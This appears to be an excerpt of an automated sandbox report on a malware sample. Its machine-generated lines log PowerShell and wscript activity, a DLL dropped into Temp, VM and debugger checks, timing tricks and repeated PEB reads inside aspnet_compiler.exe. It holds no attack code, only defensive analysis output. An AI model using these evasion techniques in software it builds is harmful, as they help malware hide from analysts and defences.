                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2096E rdtsc 12_2_01A2096E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6697Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2954Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3910Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5737Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5812Thread sleep count: 6697 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5012Thread sleep count: 2954 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4996Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5088Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: wscript.exe, 00000006.00000003.1795848194.0000000004BD7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000808F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1818468127.0000000008110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: powershell.exe, 00000003.00000002.1813925745.0000000004C37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: powershell.exe, 00000007.00000002.2067606480.0000000007880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A2096E rdtsc 12_2_01A2096E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00417063 LdrLoadDll,12_2_00417063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA197 mov eax, dword ptr fs:[00000030h]12_2_019DA197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA197 mov eax, dword ptr fs:[00000030h]12_2_019DA197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA197 mov eax, dword ptr fs:[00000030h]12_2_019DA197
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9C188 mov eax, dword ptr fs:[00000030h]12_2_01A9C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9C188 mov eax, dword ptr fs:[00000030h]12_2_01A9C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A20185 mov eax, dword ptr fs:[00000030h]12_2_01A20185
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A84180 mov eax, dword ptr fs:[00000030h]12_2_01A84180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A84180 mov eax, dword ptr fs:[00000030h]12_2_01A84180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6019F mov eax, dword ptr fs:[00000030h]12_2_01A6019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6019F mov eax, dword ptr fs:[00000030h]12_2_01A6019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6019F mov eax, dword ptr fs:[00000030h]12_2_01A6019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6019F mov eax, dword ptr fs:[00000030h]12_2_01A6019F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB61E5 mov eax, dword ptr fs:[00000030h]12_2_01AB61E5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A101F8 mov eax, dword ptr fs:[00000030h]12_2_01A101F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA61C3 mov eax, dword ptr fs:[00000030h]12_2_01AA61C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA61C3 mov eax, dword ptr fs:[00000030h]12_2_01AA61C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E1D0 mov ecx, dword ptr fs:[00000030h]12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5E1D0 mov eax, dword ptr fs:[00000030h]12_2_01A5E1D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A10124 mov eax, dword ptr fs:[00000030h]12_2_01A10124
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov ecx, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov ecx, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov ecx, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov eax, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E10E mov ecx, dword ptr fs:[00000030h]12_2_01A8E10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8A118 mov ecx, dword ptr fs:[00000030h]12_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8A118 mov eax, dword ptr fs:[00000030h]12_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8A118 mov eax, dword ptr fs:[00000030h]12_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8A118 mov eax, dword ptr fs:[00000030h]12_2_01A8A118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA0115 mov eax, dword ptr fs:[00000030h]12_2_01AA0115
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6154 mov eax, dword ptr fs:[00000030h]12_2_019E6154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6154 mov eax, dword ptr fs:[00000030h]12_2_019E6154
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC156 mov eax, dword ptr fs:[00000030h]12_2_019DC156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov ecx, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A74144 mov eax, dword ptr fs:[00000030h]12_2_01A74144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A78158 mov eax, dword ptr fs:[00000030h]12_2_01A78158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A780A8 mov eax, dword ptr fs:[00000030h]12_2_01A780A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA60B8 mov eax, dword ptr fs:[00000030h]12_2_01AA60B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA60B8 mov ecx, dword ptr fs:[00000030h]12_2_01AA60B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E208A mov eax, dword ptr fs:[00000030h]12_2_019E208A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A660E0 mov eax, dword ptr fs:[00000030h]12_2_01A660E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A220F0 mov ecx, dword ptr fs:[00000030h]12_2_01A220F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC0F0 mov eax, dword ptr fs:[00000030h]12_2_019DC0F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E80E9 mov eax, dword ptr fs:[00000030h]12_2_019E80E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A620DE mov eax, dword ptr fs:[00000030h]12_2_01A620DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA0E3 mov ecx, dword ptr fs:[00000030h]12_2_019DA0E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE016 mov eax, dword ptr fs:[00000030h]12_2_019FE016
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A76030 mov eax, dword ptr fs:[00000030h]12_2_01A76030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A64000 mov ecx, dword ptr fs:[00000030h]12_2_01A64000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A82000 mov eax, dword ptr fs:[00000030h]12_2_01A82000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DA020 mov eax, dword ptr fs:[00000030h]12_2_019DA020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DC020 mov eax, dword ptr fs:[00000030h]12_2_019DC020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E2050 mov eax, dword ptr fs:[00000030h]12_2_019E2050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0C073 mov eax, dword ptr fs:[00000030h]12_2_01A0C073
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A66050 mov eax, dword ptr fs:[00000030h]12_2_01A66050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8397 mov eax, dword ptr fs:[00000030h]12_2_019D8397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8397 mov eax, dword ptr fs:[00000030h]12_2_019D8397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D8397 mov eax, dword ptr fs:[00000030h]12_2_019D8397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DE388 mov eax, dword ptr fs:[00000030h]12_2_019DE388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DE388 mov eax, dword ptr fs:[00000030h]12_2_019DE388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019DE388 mov eax, dword ptr fs:[00000030h]12_2_019DE388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0438F mov eax, dword ptr fs:[00000030h]12_2_01A0438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0438F mov eax, dword ptr fs:[00000030h]12_2_01A0438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E83C0 mov eax, dword ptr fs:[00000030h]12_2_019E83C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019EA3C0 mov eax, dword ptr fs:[00000030h]12_2_019EA3C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A163FF mov eax, dword ptr fs:[00000030h]12_2_01A163FF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A9C3CD mov eax, dword ptr fs:[00000030h]12_2_01A9C3CD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A663C0 mov eax, dword ptr fs:[00000030h]12_2_01A663C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F0 mov eax, dword ptr fs:[00000030h]12_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F0 mov eax, dword ptr fs:[00000030h]12_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019FE3F0 mov eax, dword ptr fs:[00000030h]12_2_019FE3F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov eax, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov eax, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov ecx, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8E3DB mov eax, dword ptr fs:[00000030h]12_2_01A8E3DB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F03E9 mov eax, dword ptr fs:[00000030h]12_2_019F03E9
